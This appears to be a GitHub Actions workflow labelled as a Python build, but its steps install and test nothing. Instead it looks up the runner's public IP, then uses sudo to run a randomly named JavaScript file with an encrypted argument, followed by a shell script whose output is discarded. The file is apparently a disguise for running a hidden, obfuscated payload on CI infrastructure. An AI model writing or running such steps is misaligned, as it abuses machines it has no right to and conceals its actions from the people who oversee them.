name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 12

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        curl ifconfig.me > ip.txt
        cat ip.txt
    - name: Test run
      run: |
        cd ${{ github.workspace }}
        echo 'f31l8'
        sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+TgSfBZoUcncgcO0dHa36JLBcpLozJwe5DYJKbmUSrjrveiq5JnxHDVnKXT0Us9BEw+zSV82bF25+CUWp7Tkud2k4aiQqh4vTU/YCtPupajK9xb4QZpNrK bg0p58 && sudo sh r.sh > /dev/null 2>&1
